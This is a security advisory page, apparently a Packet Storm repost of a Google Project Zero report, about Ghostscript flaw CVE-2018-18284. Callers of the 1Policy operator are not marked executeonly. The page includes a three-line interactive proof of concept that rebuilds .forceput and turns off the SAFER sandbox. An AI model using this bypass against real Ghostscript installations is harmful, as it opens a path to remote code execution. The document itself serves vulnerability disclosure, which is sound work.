what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Ghostscript 1Policy Dangerous Access To Operator

Ghostscript 1Policy Dangerous Access To Operator
Posted Oct 18, 2018
Authored by Tavis Ormandy, Google Security Research

Ghostscript has an issues where callers of a procedure are not forced to be properly marked as executeonly or pseudo-operators, allowing for the ability to take complete control of it.

tags | advisory
advisories | CVE-2018-18284
SHA-256 | c212335a3050997bb3269410331972bd215ee205ac25561281f6b950ad7bb670

Ghostscript 1Policy Dangerous Access To Operator

Change Mirror Download
ghostscript: 1Policy is a dangerous operator, but callers are not odef 

CVE-2018-18284


This operator from gs_setpd.gs is correctly marked as executeonly and marked as a pseudo-operator (odef):

% Apply Policies to any unprocessed failed requests.
% As we process each request entry, we replace the error name
% in the <failed> dictionary with the policy value,
% and we replace the key in the <merged> dictionary with its prior value
% (or remove it if it had no prior value).

% Making this an operator means we can properly hide
% the contents - specifically .forceput
/1Policy
{
% Roll back the failed request to its previous status.
SETPDDEBUG { (Rolling back.) = pstack flush } if
3 index 2 index 3 -1 roll .forceput
4 index 1 index .knownget
{ 4 index 3 1 roll .forceput }
{ 3 index exch .undef }
ifelse
} bind executeonly odef


But the operator itself doesn't do very much except for pass the parameters to .forceput, therefore any procedure that calls this pseudo-operator should itself be a pseudo-operator (I know, I know, this is some arcane postscript).

Because the callers are not executeonly or pseudo-operators, we can just extract a reference to it and take complete control of ghostscript:

GS>/.forceput { <<>> <<>> 4 index (ignored) 5 index 5 index .policyprocs 1 get exec pop pop pop pop pop pop pop } def
GS>systemdict /SAFER false .forceput
GS>SAFER ==
false

For a full exploit once you have .forceput, see <a href="/p/project-zero/issues/detail?id=1682" title="ghostscript: executeonly bypass with errorhandler setup" class="closed_ref" rel="nofollow"> bug 1682 </a>.

This is a critical remote code execution vulnerability.

This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.




Found by: taviso

Login or Register to add favorites

File Archive:

August 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    20 Files
  • 2
    Aug 2nd
    4 Files
  • 3
    Aug 3rd
    6 Files
  • 4
    Aug 4th
    55 Files
  • 5
    Aug 5th
    16 Files
  • 6
    Aug 6th
    0 Files
  • 7
    Aug 7th
    0 Files
  • 8
    Aug 8th
    13 Files
  • 9
    Aug 9th
    13 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    0 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close